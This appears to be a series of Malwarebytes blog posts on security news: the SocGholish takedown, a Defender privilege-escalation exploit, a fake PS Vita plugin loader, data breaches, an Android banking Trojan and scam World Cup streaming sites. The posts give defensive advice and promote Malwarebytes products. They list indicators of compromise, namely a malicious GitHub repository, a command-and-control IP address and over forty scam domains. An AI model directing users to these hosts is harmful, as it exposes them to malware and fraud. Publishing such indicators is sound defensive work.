Malware Bytes

We’re always happy to end the week with some positive news. A law enforcement action called Operation Endgame just delivered a major win against the long‑running SocGholish (aka FakeUpdates) operation.

SocGholish is a malware framework that has been active since at least 2017 and is best known for abusing hacked, legitimate WordPress sites to push fake browser and software updates to visitors. When a user clicks one of these convincing “update now” prompts, the malware opens a backdoor on the system, giving attackers initial access that is often used to deploy ransomware and other malicious software. The operation has been linked to the Russian cybercriminal group Evil Corp, previously associated with Zeus and Dridex malware, as well as major ransomware and money‑laundering schemes.

This week, Dutch police and the Public Prosecution Service, working with the Royal Canadian Mounted Police, FBI, German Federal Criminal Police Office, Europol, and Eurojust, struck directly at SocGholish’s infrastructure. As part of Operation Endgame, they took down 106 servers and domains and cleaned 14,971 infected WordPress sites that had been silently redirecting visitors into the FakeUpdates trap.

Investigators say they found exposed login credentials for around 1.4 million WordPress sites. To check whether any passwords associated with your email address have been exposed in a breach, use Malwarebytes Digital Footprint Scanner.

Dutch authorities also used their hacking powers to remove backdoors and malware from compromised sites and notified affected site owners, urging them to update WordPress, enable multi-factor authentication (MFA), and change passwords.

Authorities say the infected sites included everyday businesses such as restaurants and car garages, meaning visitors could have been exposed to malware simply by browsing trusted local websites.

The scale and intent matter here. Endgame is billed as the largest international operation against ransomware and cybercrime to date, and this SocGholish takedown specifically disrupts a key infection chain used by multiple ransomware groups. By breaking the link between thousands of everyday websites and a sophisticated malware‑as‑a‑service ecosystem, law enforcement has reduced the pool of future victims and increased the cost of operating for Evil Corp and its partners.

So, as you head into the weekend, here’s a malware story where the good guys actually pushed back and made it hurt.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Apple has patched a Bluetooth flaw in Beats Studio Buds that could potentially turn your earbuds into a nearby wiretap.

When you buy a pair of Bluetooth earbuds, you expect them to play your music and your calls—not someone else’s. But a vulnerability in Apple’s Beats Studio Buds shows how that trust can be abused, turning everyday audio gear into a potential eavesdropping tool for anyone close enough and skilled enough to exploit it.

The vulnerability is tracked as CVE-2025-20701. Researchers disclosed flaws in Airoha system-on-a-chip (SoCs) devices at a security conference in Germany in 2025. Because Airoha chips are used in a wide range of audio products, the issue affected multiple devices, including Beats Studio Buds.

The researchers also showed how the vulnerability could be combined with flaws they found in the same Airoha component. By chaining these flaws, attackers could:

• Eavesdrop via headphone microphones.
• Extract pairing keys.
• Impersonate trusted headphones.
• Compromise the user’s phone, enabling call hijacking, contact extraction, triggering voice assistants, and more.

The good news is that these attacks are not easy to pull off. Exploitation is complex, and the attacker must be within Bluetooth range of the target device.

Basically, CVE-2025-20701 is a flaw in the authentication process and affects devices that are not yet paired and are actively looking for something to connect to. In a normal scenario, your headphones and your phone go through a pairing process that establishes keys and trust before any sensitive operations—like using the microphone—are allowed.

In this case, devices in pairing mode did not properly verify who they were talking to. That opened a window where any nearby attacker could pose as a legitimate partner and connect to the earbuds before the user completes the pairing process.

As Apple describes it:

“An attacker within Bluetooth range may be able to listen through the microphone of a device which is not yet paired and actively seeking pair requests.”

How to stay safe

To address this vulnerability, Apple shipped Beats Firmware Update 1B211, which rolls out automatically once the earbuds are near and connected to an iPhone, iPad, or Mac.

For the average user, the need for physical proximity, specialized hardware and software, and some patience means opportunistic criminals are more likely to stick with phishing and credential stuffing than stalking Bluetooth signals in public spaces.

But for a motivated attacker targeting a high-profile individual, this is exactly the kind of bug they’d use.

There is no “Update now” button, but if you own Beats Studio Buds and use them with an iPhone, iPad, or Mac, you should automatically receive the update when:

• The earbuds are paired with your Apple device
• They are in their charging case, with the lid closed
• The case and buds have sufficient charge, and the Apple device is nearby with Bluetooth enabled

To check whether you’re protected:

• On iOS or iPadOS, go to Settings > Bluetooth
• Tap the info icon next to your Beats Studio Buds
• Look at the firmware or version number. It should read 1B211 if the security update has been applied. If it says anything else, your earbuds may not have received the update yet. If you see an older version, keep the earbuds in their case near your iPhone, iPad, or Mac for a while to give them time to update. This can take some time and may happen silently in the background, so checking again later is worth the effort.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

A publicly available exploit called RoguePlanet can give attackers the highest level of access on Windows systems. Microsoft has confirmed the vulnerability and says it’s working on a security update.

RoguePlanet is tracked under CVE-2026-50656, where it’s described as a Microsoft Defender Elevation of Privilege (EoP) vulnerability.

In its advisory, Microsoft says:

“Microsoft is aware of an elevation of privilege in the Microsoft Malware Protection Engine in Microsoft Defender publicly referred to as “RoguePlanet “. We are working to provide a high quality security update that addresses this vulnerability. We will provide information in this CVE when the update is available.”

If successfully exploited, RoguePlanet can allow an attacker to elevate privileges from a standard user account to NT AUTHORITY\SYSTEM, the highest privilege level on Windows.

This means an attacker who manages to get access to a standard user account on your computer could use the vulnerability to gain complete control of the system. They don’t need advanced hacking skills or administrator permission to do this.

The success of the published exploit does depend on a race condition, though. This means its success depends on the precise timing of two events. The researcher wrote:

“I have managed to get a 100% success rate on some machines while it struggled to work on others.”

According to the researcher, the problem lies in a high-level part of the Microsoft Defender code, which may help to explain why Microsoft says it’s working on a “high quality security update.”

This same researcher has submitted three earlier Microsoft Defender vulnerabilities known as BlueHammer (CVE-2026-33825), UnDefend (CVE-2026-45498), and RedSun (CVE-2026-41091), as well as four other Windows zero-days, all of which have since been patched by Microsoft.

How to protect your machine

The exploit reportedly works whether you’re using active protection or not, so disabling Microsoft Defender is not a solution. But there are a few things you can do to protect your machine:

• Look out for a Microsoft security update addressing this vulnerability and install it as soon as it becomes available.
• Back up your important data on a platform or device that is not directly connected to your computer.
• Be careful about downloading executable files from unknown sources or running files that are recommended to you without you asking for them.
• Do not rely on Microsoft Defender as your only anti-malware solution. Malwarebytes detects RoguePlanet.exe (the exploit code) based on its behavior.
  

Obviously, we’ll keep you posted about this and other security issues, so stay tuned.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Retro gaming fans should be careful with GitHub projects that claim to be tools or plugins for their consoles. Attackers can disguise ordinary computer malware as homebrew software, and the technique works against any retro platform with an active modding scene, not just one console.

We recently looked at one example aimed at PlayStation Vita owners: a fake project that pretends to be a free audio tool but actually runs Windows malware on your computer.

The project, called EQVita, looks like a normal homebrew plugin. It has a polished README, a download button, screenshots, and a tidy layout. But the file you download doesn’t contain anything for a Vita at all. It contains three Windows files, and the harmless-looking text file among them is actually a hidden script that quietly connects to the attacker’s server once you run it.

This isn’t a one-off. Other researchers have observed attackers using fake GitHub repositories—dressed up with AI-generated descriptions—to spread a type of malware called SmartLoader, which then pulls in password and wallet-stealing malware such as Lumma Stealer. The EQVita download uses the same method, repackaged to appeal to retro gaming fans.

Take a look at the comparison below. On the left we have a fake GitHub repository, on the right a real one.

There’s even a small trick in the version number. The real EQVita is on version 1.10, while the fake is labeled 1.3. At a glance, 1.3 may appear newer—but it isn’t. In software, 1.10 comes after 1.9, so the real project is the more up-to-date one. The fake just borrows a number that looks current.

Why this targets the Vita community

If you’re not into retro consoles, the PS Vita might not mean much to you. But for a large and active community, it’s a big deal, and that makes it a target.

I’ll admit a soft spot here: I bought my own Vita 1000 second hand about ten years ago, and it still runs beautifully. It comes off the shelf every now and then, mostly because the library is so deep there’s always something worth coming back to. I’m clearly not alone.

Even though Sony stopped making the Vita years ago, fans have kept it alive by writing their own software for it: emulators, file managers, and plugins. A modded Vita can run its own PSP games at full speed and emulate older systems like the SNES, Game Boy Advance, and Sega Genesis, which turns the handheld into a do-everything retro machine. In 2026 the scene is thriving, with active developers and even homebrew contests with cash prizes.

That demand shows up in the price, too. With no new units made since 2019, working Vitas have become a sought-after retro item, and resale prices have climbed across the major marketplaces over the past year—the older OLED model, prized by modders for its firmware, has risen the most. In other words, more people than ever are buying a Vita specifically to mod it, which means more people hunting for plugins and tools to install.

That enthusiasm is exactly what attackers abuse. Homebrew users are used to downloading files from GitHub, dropping them into folders, and running them. The whole hobby runs on trusting code from individual developers. Scammers know this, so a fake “Vita plugin” is an easy way to get people to run something they normally wouldn’t.

How the scam works

The download, EQ_Vita_v1.3.zip, contains three files:

• Launch.bat
• luajit.exe
• x64.txt

Here’s the clever part. luajit.exe is a real, harmless program that runs scripts. The batch file simply tells it to open x64.txt. Despite the .txt name, that file isn’t text at all—it’s a hidden script, and LuaJIT runs it. Calling it .txt is what makes it look harmless and easy to scroll past. Researchers found the same setup in the SmartLoader campaign: the only dangerous file in the download is the disguised script, and everything around it is legitimate.

So nothing in the download looks dangerous on its own. There’s no obvious installer and no scary-looking app—just a trusted tool being used to run someone else’s code.

We watched what happened when it ran. First, the script checked where in the world the computer was. Then it quietly contacted a server on the internet and sent it data, using a web address scrambled into a meaningless-looking string. The server answered back.

An audio plugin has no reason to do any of that. This is how a malware “loader” behaves: it phones home to the attacker’s server to receive instructions and fetch its next piece of malware. In this campaign, that next piece is usually a stealer—malware that hunts for cryptocurrency wallets, saved browser passwords, and login codes.

Malwarebytes blocks this threat, so protected users are stopped before the file can run.

How to spot the fake

Most Vita plugins are installed on the Vita, using tools like VitaShell or Autoplugin, and they come as Vita files (the kind ending in .skprx or .vpk).

Some legitimate tools in the scene—installers, file-transfer helpers, build tools—do run on a PC, so a Windows program isn’t automatically bad. The key is to check before you run it.

Is it well known? Is it widely used? Is it recommended by trusted community sources, or did you just stumble onto it in an unfamiliar repository? A “plugin” that quietly leans on a .bat file to launch a hidden program is exactly what that check is meant to catch.

A few habits help:

• Match the file to the device, and verify PC tools. Most Vita plugins are Vita files, not Windows programs. Some legitimate tools do run on your PC, so don’t panic at an .exe or .bat, but check that it’s a well-known, trusted tool before running it.
• Be wary of “Download Now” polish. Real homebrew READMEs are written for users like other developers. In this campaign, the fake repositories lean on AI-generated text, which tends to read like marketing: heavy on emoji, friendly phrasing, and a big download button. A project that pushes you to click fast deserves a second look.
• Stick to trusted sources. Established community hubs and trusted-source lists exist for a reason. Check before you download.
• Add another layer of protection. Malwarebytes Browser Guard can help block known malicious pages and downloads before they reach you.

What to do if you’ve already run it

If you have downloaded and run EQ_Vita_v1.3.zip, you should treat the computer as compromised. Here’s what to do:

• Run a full malware scan with up-to-date security software.
• Because this campaign delivers information-stealing malware, change your important passwords from a different, clean device, and review your accounts for unauthorized logins.
• If you keep any cryptocurrency on that computer, move your funds using a different, clean device and rotate your keys and seed phrases.
• Check your two-factor authentication (2FA) settings, as stealers can also target 2FA data.
• Finally, delete the three files and report the GitHub repository so it can be taken down.

Why this scam works

It works because it doesn’t look like a scam. It lives on GitHub, where homebrew users already place their trust. It uses a real, harmless tool to do its dirty work. And it hides the dangerous part inside a file that looks like plain text. None of those tricks is clever on its own, but together they slip right past the quick checks most people actually do.

What makes this one worth noting is where it’s aimed. Retro communities run on goodwill—volunteers who keep old hardware alive, share their work for free, and vouch for one another’s tools. That same trust is what this campaign exploits, and every fake repository that slips through makes the next genuine project a little harder to trust.

The best defense is the one these communities already have: trusted-source lists, established wikis, and people who test things and report back. Verify where a file comes from before you run it, and when something doesn’t add up, say so. That habit is what keeps the scene safe for everyone in it.

Indicators of Compromise (IOCs) Domains

https://github.com/Voistace/EQVita
https://voistace.github.io

IP

85.137.52.21 C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The Eastman Kodak Company (Kodak) confirmed to BleepingComputer that it is investigating a security breach after the ShinyHunters extortion group claimed responsibility for the incident.

Kodak is the latest organization to land on the group’s leak site. ShinyHunters claims it stole more than 2.2 million records and threatened to publish the data unless the company responded by June 18.

“Over 2.2 million records containing customer PII and other internal corporate data was compromised. This is a final warning to reach out by 18 June 2026 before we leak along with several annoying (digital) problems that’ll come your way.”

Kodak has now confirmed a data breach, while also saying the incident was limited in scope, contained, and did not pose a threat to its systems or operations.

ShinyHunters has been busy making the same point across multiple victims: modern extortion is often less about ransomware (encryption) and more about access, stealing valuable data, and applying pressure.

ShinyHunters claims it stole customer information and internal corporate data, but has not publicly provided proof. That’s a common pattern for extortion groups. They make public claims, set a deadline, and use the threat of a data leak to pressure victims before the full facts are known.

Kodak told SecurityWeek that an unauthorized third party gained access to a limited amount of company data, and that the incident appears to have been contained. The company said it brought in external cybersecurity experts, notified law enforcement, and believes there is no threat to its systems or operations.

It’s not yet known how the attackers gained entry to Kodak’s systems, but the extortion group is well-known for social engineering, bribery, and utilizing zero-day vulnerabilities to perform supply-chain attacks. The investigation is ongoing.

How to stay safe

While Kodak works to determine who was affected and exactly what information was accessed, there’s no reason to panic. But there are a few things you can do:

• Change the password on your Kodak account and make sure you haven’t reused the same password on other accounts.
• Turn on multi-factor authentication (MFA) wherever possible, to ensure that a stolen password is not enough to take over your account.
• If you’re in the US, consider placing a credit freeze with Equifax, Experian, and TransUnion. A credit freeze helps prevent identity thieves from opening new accounts in your name by blocking lenders from accessing your credit file.
• Depending on the information involved, Kodak may offer affected customers free credit monitoring. Even if it doesn’t, you may want to consider identity monitoring services, which can alert you if your personal information appears in suspicious places or is used to open accounts, apply for credit, or commit fraud.
• Check your Digital Footprint regularly to see if your personal details have been exposed.

Cybercriminals often exploit the confusion that follows a breach. They know victims will be expecting emails and updates from the affected company, making phishing messages more convincing.

Monitor Kodak’s official website for updates, and be skeptical of unsolicited emails, texts, or phone calls the reference the incident. Look for inconsistencies, unusual sender addresses, and strange links, and watch out for the two biggest warning signs: pressure to act immediately and requests for money, passwords, or personal information.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Account theft usually ends with someone losing a password. This one ends with hackers walking off with the entire game.

Developers behind some of Roblox’s millions of games told 404 Media that attackers persuaded them to run a single file. Then they watched their group, their game, and their Robux (in-platform currency) balance vanish into someone else’s account within hours. In several cases, Roblox support didn’t help them get the games back until a reporter called the company for comment.

From beaming to hostile takeover

Roblox attacks used to be opportunistic. “Beamers” targeted individual players to steal rare hats, limited items, and accounts, then resold them. The pattern has shifted. The new targets are developer accounts, and the prize is the game itself.

Ioannis Matziaris told 404 Media that his two 20-year-old sons spent five years building a Roblox game called The Shadow Network. In April, attackers approached one of them with a job offer and convinced him to run a particular file. It was malware. The attackers stole control of the game, the group’s Roblox account, and their Robux balance.

Another developer, Jovan Rai, received the same project-manager job pitch. This time, the attackers were impersonating Cheesy Studios, the Matziaris brothers’ company, to lend the offer credibility. The 15-year-old was earning roughly 10,000 Robux (around $38) per day from his game. He spent more than 30 days trying to recover it through Roblox support before media attention helped move the case forward.

The malware behind the theft

Developer Mohamed Kaparoza described how the attack worked. Attackers contacted him on Discord, dangled a project-manager role, and asked him to install a Python package called “robase,” which they claimed was a database tool. Shortly after installing it, he was logged out of Roblox on both his PC and his phone. His Discord account went with it, and his two-step verification settings and passkey were changed.

This is a case of session-token theft, rather than credential theft. Once an infostealer steals an authenticated browser session, attackers can often bypass security measures such as two-factor authentication (2FA) because they are reusing a session that has already been authenticated.

The technique itself isn’t new. We reported on a similar campaign in January 2025 that targeted Roblox players with offers to beta test new games. The “installer” was actually an infostealer designed to steal data, including Discord and Steam sessions, and cryptocurrency wallet information.

What developers can do

If you build Roblox games, the defensive advice is unglamorous and mostly behavioral.

• Treat unsolicited Discord job offers with caution. If a stranger asks you to install a “database tool,” a custom installer, or any file at all, do not run it.
• Developers who need to test unfamiliar software should do so in an isolated environment, such as a virtual machine, rather than on a device where they are signed in to Roblox, Discord, GitHub, or other important accounts.
• Review active Roblox sessions and signed-in devices regularly, and switch on Roblox’s Enhanced Protection features where available. They won’t stop session-stealer malware, but they can help protect against many other forms of account compromise.
• If the worst happens, document everything as early as possible. Keep records of messages, screenshots, account changes, and support requests to help with any recovery process.
• Use security software with real-time protection. Malwarebytes Premium can detect and block infostealers and other malware before they compromise your accounts.
  

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Researchers have analyzed a new Android banking Trojan called Rokarolla. It can effectively take over a device, steal banking and crypto login details from more than 200 apps, and quietly monitor much of what you do on your phone.

On an infected device, Rokarolla steals banking and crypto login details. It also uses fake lock-screen overlays to capture your PIN, pattern, or password.

When you open one of the banking or crypto apps on Rokarolla’s target list, the malware downloads and displays a matching fake login page over the real app. Anything you type into the fake page, including usernames, passwords, and card numbers, is sent to the attackers.

Separately, Rokarolla abuses Android’s Accessibility features to monitor activity across the device. It can recognize WhatsApp screens by looking for familiar labels such as “Chats” and “Calls,” extract contact information, read SMS messages, and send new ones. These capabilities can help it intercept one-time passwords (OTPs) and two-factor authentication (2FA) codes.

Rokarolla can take control of text messages and phone calls, helping it block security alerts and hide signs of fraud.

It can also record everything you type and see on the screen. If you copy and paste a cryptocurrency wallet address, the malware can secretly replace it with one belonging to the attackers.

Other features help the malware stay hidden, including the ability to hide its icon, silence the device, turn off Google Play Protect, and prevent the screen from going to sleep.

How it spreads

Rokarolla is distributed through rogue websites, where it is offered as fake versions of popular apps like TikTok or Chrome.

Malwarebytes blocks the download site

Instead of sending you to the official Google Play Store, these malicious sites push you to download the app directly, a process known as sideloading. After you install it, the fake app poses as Google Play Protect and quietly downloads and installs the malware that carries out the attack.

To gain the access it needs, the fake app asks for powerful permissions, including Accessibility access, the permission to read SMS messages, and access to notifications. Because these requests can look legitimate, many users may approve them without realizing the risks.

How to stay safe

To avoid banking Trojans like Rokarolla, there are a few guidelines you should follow:

• Don’t trust apps that claim to be Google Play Protect or another system component. You should never need to install these manually.
• Use up-to-date, real-time anti-malware protection with web protection on your devices.
• Don’t sideload apps that are available on the Google Play Store. While malware can sometimes slip into official stores, the risk is much greater elsewhere.
• Deny powerful permissions to apps downloaded from links or websites, especially if they ask for Accessibility access, SMS permissions, or the ability to handle calls, even though that doesn’t match their stated purpose.
• In fact, any request for Accessibility access should be treated with caution. If an app that is not clearly an accessibility tool asks for it, deny the request and reconsider whether you trust the source.
• Scrutinize banking and crypto login screens. If something looks off, or you see multiple login prompts, close the app and relaunch it from its official icon.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

A newly discovered database containing 24 billion stolen records is a reminder that personal information from data breaches, phishing campaigns, and infostealer infections continues to circulate online.

The collection was briefly exposed on the internet before being taken offline. While researchers can’t confirm exactly whose information was included, the discovery is a good opportunity to check whether your email addresses, passwords, or other personal data have already been exposed.

The best place to start is with Malwarebytes Digital Footprint Portal (DFP), which can show you whether your information has appeared in known data exposures and breaches.

What happened?

Researchers at Cybernews found a publicly exposed Elasticsearch cluster holding more than 8.3 TB of data.

The data, consisting of 24 billion credential records, reportedly came from 36 sources, including numerous Telegram channels, prior breach compilations, collections of infostealer logs, and some datasets apparently exported directly from live servers.

Because the data came from different sources there are some differences in what the records contain and how they are organized.

Some records were structured infostealer logs containing usernames, email addresses, and plaintext passwords, and the associated login URL. Roughly 1.7 billion records came from hacking-related Telegram channels, mainly English and Russian, including at least one focused on stolen credit card data.

The exposed database was hosted on an Elasticsearch cluster. Elasticsearch is a tool used to quickly store and search lots of data. If an Elasticsearch server lacks passwords, authentication, or network restrictions, it can be accessed by anyone who finds it online. Without protections such as passwords or a firewall, anyone can read, copy, change, or even delete its data.

Other documents in the dataset contained information about known vulnerabilities, articles about breaches, and social media posts about cyberattacks. This suggests the owner actively monitors security news and vulnerabilities and enriches the credential hoard with fresh breach information, either for a commercial “monitoring” service or for offensive use.

A few years ago, we wrote about what was called the Mother of All Breaches, where the source of the dataset has been identified as data breach search engine Leak-Lookup.

This newly discovered 24‑billion‑record exposure is in the same league as that previous mega‑dump, but appears more heavily weighted toward fresh infostealer logs, rather than older, static breach data.

An infostealer log from a single infected device can include passwords stored across all browsers, active session cookies and tokens (including those that bypass MFA), autofill data, device fingerprints, and sometimes crypto wallets or messaging accounts. The complete bundle is what ends up in logs such as those seen by the Cybernews researchers.

Since the data was taken out of public view soon after the discovery, the researchers were unable to fully retrace everything they had found or determine how many duplicate records it contained. That’s reassuring because it reduces the chances of cybercriminals finding the database, but reused passwords may still put accounts at risk.

What to do now

It’s good to be aware of how much information about you is out there and who’s gathering it, but it’s even more important to know exactly which information they have, since that is what they can use against you.

Start by checking whether your email address has appeared in known breaches or infostealer logs.

Check whether your data is exposed

If you discover exposed passwords, change them immediately and make sure you aren’t reusing the same password across multiple accounts.

If you have reused passwords in the past, prioritize updating important accounts such as email, banking, shopping, and social media accounts. Turn on multi-factor authentication (MFA) wherever possible, since it can help protect accounts even if a password has been exposed.

How to protect your data

Because infostealers commonly arrive through malvertising, fake browser updates, and one-click downloads, it’s worth treating ads and pop-ups with healthy skepticism. My personal tip: Never click on sponsored ads. Instead, visit official websites directly and download software only from trusted sources such as official vendor sites or app stores.

Another increasingly popular technique is ClickFix, a social engineering attack that tricks users into infecting their own devices. Never run commands or scripts copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.

Pirated software, game cheats, and cracked tools are some of the most common delivery methods for infostealers. These downloads often come bundled with malware that installs alongside the software you intended to get. The same caution applies to many browser extensions and add-ons that promise extra features or convenience. Stick to extensions from reputable developers, check reviews and permissions carefully, and avoid installing any add-on that asks for more access than it plausibly needs.

Phishing emails are still a major threat, but many can be spotted if you slow down and verify before clicking. Even if an email looks like it comes from a trusted brand, treat unsolicited attachments and links with caution, especially when they urge you to open a file, install something urgently, or fix a billing issue. If you’re unsure, check the sender address, look for typos or odd phrasing, and confirm the request through a separate channel such as the company’s official website rather than the link in the email.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Our job is to protect people from online threats, and independent testing is one of the best ways to measure how well we’re doing.

Malwarebytes nabbed AV-TEST’s Top Product award after scoring 17.5 points out of a possible 18 in the research organization’s most recent Windows security test. The award is the latest in a string of endorsements from third-party testers whose ongoing evaluations help keep us sharp.

Here’s a closer look at the results.

AV-TEST Windows Consumer Security Product Test

AV-TEST’s Windows Consumer Security Product Test, which took place in March and April, assessed 14 security applications across three categories: how well they protected Windows PCs from malware, how much they slowed down a device, and how often they raised false alarms.

AV-TEST noted in its synopsis:

“We focused on realistic test scenarios and challenged the products against real-world threats. Products had to demonstrate their capabilities using all components and protection layers.”

To receive the Top Product award, companies had to score 17.5 points or higher out of a total of 18, earning a maximum of six points in each category. Malwarebytes has received a Top Product endorsement from AV-TEST more than a dozen times since it first began taking the test in 2018.

MRG Effitas Consumer Assessment Certification

Malwarebytes once again came out on top in the MRG Effitas Consumer Assessment Certification, which tested eight security products to measure their ability to block malware, protect against phishing, and avoid false positives.

Malwarebytes was the only company to achieve Level 1 Certification, meaning we succeeded in stopping all 300 in-the-wild infections without causing damage to the device or its data, generated zero false positives, and blocked at least 79% of phishing attempts. Our phishing detection rate was 100%.

This certification is particularly impressive because the test used newly discovered malware samples, meaning most security products had not encountered them before.

AVLab Advanced In-the-Wild Malware Test

Continuing our winning streak, Malwarebytes received a perfect score (421/421) in AVLab’s Advanced In-The-Wild Malware Test, earning an “Excellent” certificate. The test applied existing threats currently circulating online, delivered the way a real user would come across them.

To receive the “Excellent” certification, a security product had to stop at least 99.6% of malware threats, either before they could run or during an attack. We detected and blocked every single real-world threat in an average of 0.508 seconds—a full 3 seconds faster than the industry average.

These types of independent assessments are important. They keep us on top of our game, which in turn keeps our customers safe.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

With the World Cup on, you’ll find no shortage of websites promising every match, live, in HD, for free. They look convincing, usually with a video player, a “Live Stream Available” indicator, a row of server buttons, maybe a match schedule, and a “Watch Live” button. There’s no signup, no paywall, and seemingly, no catch.

But of course there’s a catch. These sites aren’t really in the business of streaming football. What the page is really built to do is fire pop-ups, hidden ads, and redirects through an advertising network we detect as malicious. Instead of watching the match, visitors end up facing scams, malware, and fraudulent downloads.

Here’s how the scam works and how to stay out of it.

.kb-advanced-slider-423028_956a35-72 .kb-slider-pause-button{color:#fff;background-color:rgba(0, 0, 0, 0.8);border:1px solid transparent;}

If they’re not real streaming sites, what are they?

We’ve identified more than 40 websites that are effectively identical. They use different World Cup-themed names, but behind the scenes they’re running the same page template, the same code, and the same advertising infrastructure.

A script generates a separate page for every match, making the operation cheap to run and easy to scale.

When a stream appears at all, it’s usually embedded from a third-party piracy service. The real business is the advertising surrounding the player.

A typical page loads eight or more ad and tracking scripts from the same shady network, plus a handful of other ad domains. The hub the whole page is wired to is a domain we detect as malicious. Your data is the product; the “stream” is the bait.

Why these sites are dangerous, not just annoying

It’s tempting to shrug this off as the usual price of free streams. But it’s worse than facing a few annoying ads.

The real threat is the ad network. This isn’t mainstream, vetted advertising. The kind of ad network we flag as malicious is a common delivery route for the stuff that causes harm: fake virus warnings, bogus software update prompts that install malware, fake prize and verification pages, and forced redirects into subscription traps.

The video window itself is untrusted. The stream is pulled from a third-party piracy service, not anything the site controls or vets. Pirated stream embeds are a well-known source of their own ads, redirects, and hidden clickable overlays, so even the part that looks like a video player can be working against you.

There’s nobody behind the counter. These are anonymous, disposable sites built around a major sporting event. There’s no real company, no support, no accountability, and no reason for them to care what lands on your screen.

It’s the oldest play in the scam handbook: take something millions of people want right now, present it nicely, and monetize the rush. Scammers don’t create the demand, they just stand in front of it with a bucket and collect payment.

How it works (a quick technical version)

The first tap is hijacked. A script waits for your first click or tap anywhere on the page and uses it to open an ad in a new tab or window, often in the background. Before you’ve watched a second of football, you’ve already triggered an ad.

The “Play” button is a maze. Clicking Play doesn’t play anything. Instead, you’re sent through prompts like “Click Resume to continue” before you might reach a video. Every extra step is another click, and each click triggers more ads.

Invisible ads load. The page quietly loads tiny, invisible 1×1-pixel ads and opens more tabs. These exist purely to generate paid ad views. The tactic has many of the hallmarks of ad fraud, and you’re the unwitting traffic. More ads are injected into the player area the moment you try to watch.

The stream is an afterthought. Often there’s no working stream at all, so the page loops you through “Streams loading… Retry,” which means more clicks and more ads. Whether you ever see the match or not, the ads have already cashed in.

What the ads are serving up

The code fires the ads; but here’s what comes out the other end. On these pages, the injected ads tend to fall into two buckets, and neither has anything to do with football.

The first is fake message notifications: little pop-ups designed to look like real chat alerts, complete with a stranger’s photo and messages such as “Seen my message yet? Let’s talk!” Some include fake voice messages or explicit thumbnails. They’re made to look like notifications you’ve forgotten to check so you’ll click them.

The second is crypto bait. These ads promote “play-to-earn” games with promises of daily rewards, surprise drops, massive airdrops, and eye-catching claims like a “124% APY yield engine.”

One warning sign is the promise of guaranteed triple-digit returns and free money for tapping a button. That’s not how legitimate financial products work.

That’s the whole machine working end to end: football is the doorway, the malicious advertising network is the engine, and the scams are what it’s actually selling.

How to watch the World Cup safely

These “Free HD stream, every match, no catch” sites use football as bait to funnel visitors through a malicious advertising network. Here’s how to stay safe:

• Use official broadcasters and streaming services. That’s where the legal and safe coverage lives.
• Treat “every match, free, HD, no signup” as a red flag. Broadcast rights are expensive. If a random website is giving everything away for free, it’s making money some other way.
• Don’t follow a maze of interactions. If a streaming site opens pop-ups, launches extra tabs, or sends you through endless “click to continue” screens, close it.
• Never trust warnings or download prompts on these sites. Don’t download anything, install anything, or enter any information.
• Block ads and trackers in the browser. A tool like Malwarebytes Browser Guard can block the advertising and tracking domains these sites rely on, helping stop pop-ups and redirects before they load.
• Keep your software up to date. Browser and operating system updates often fix security vulnerabilities that attackers try to exploit.
• Use up-to-date, real-time anti-malware. If you do click something malicious, products like Malwarebytes Premium can block and remove malware before it causes damage.

Indicators of compromise (IoCs)

Domains

arenaworldcupfootball.xyz
footballworldcup.xyz
freeworldcup.xyz
freeworldcupstream.xyz
freeworldcupstreaming.xyz
livestreamingworldcup.xyz
livestreamworldcup.xyz
liveworldcup.today
liveworldcup.xyz
liveworldcup2026.xyz
liveworldcupmatch.xyz
matchoraworldcup.world
matchworldcup.xyz
sportivaworldcup.xyz
sportworldcuponline.xyz
watchworldcup.watch
watchworldcup.world
watchworldcup2026.xyz
watchworldcupfree.live
watchworldcupfree.online
watchworldcupfree.xyz
worldcup2026match.xyz
worldcuparena.xyz
worldcupfoootballmatch.xyz
worldcupfootball.live
worldcupfootballmat.live
worldcupfootballmatch.live
worldcupfootbmatch.xyz
worldcupfreeonline.xyz
worldcuplive.world
worldcuplivestream.online
worldcupmatch.online
worldcupmatch.world
worldcupmatch.xyz
worldcupmatchlive.live
worldcupsoccer.live
worldcupsoccermatch.live
worldcupstreameast.online
worldcupstreameast.xyz
worldcupusa.world
worldcupusa.xyz

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Cardiac monitoring provider iRhythm has been hit by a data theft followed by an extortion attempt.

In a filing with the Securities and Exchange Commission (SEC), iRhythm revealed it was contacted by someone on June 9 who claimed to have stolen sensitive information, including proprietary data, patient PHI, and other personal information. That person demanded payment in exchange for not publishing the data.

iRhythm provides ambulatory cardiac monitoring and analysis (for example using the Zio patch) and has reportedly processed over two billion hours of heartbeat data from more than twelve million patients.

In the filing, the company said the data was obtained through social engineering and is from “certain third-party-hosted business applications”, without revealing any further details about the amount of data.

On its own website, iRhythm also doesn’t disclose much about the nature of the stolen data, but does seem to imply no financial data was affected:

“We have not identified any impact to our products, our clinical or medical device systems, our connections to customers, our manufacturing and distribution operations, patient safety, or our ability to meet patient needs. In addition, we do not store or retain individual financial account information or payment card information. 

 As we actively investigate, we will notify individuals affected by this incident in accordance with applicable law and take steps as needed to protect and remediate the impact to them.“

However, the SEC filing adds that iRhythm determined that the incident is significant, “in light of the volume of the potentially affected data.” Together with the extortionist’s claims that they have patients’ medical data, that makes the breach one worth noting if you have used iRhythm’s services.

Even without payment data, healthcare breaches have serious downstream effects:

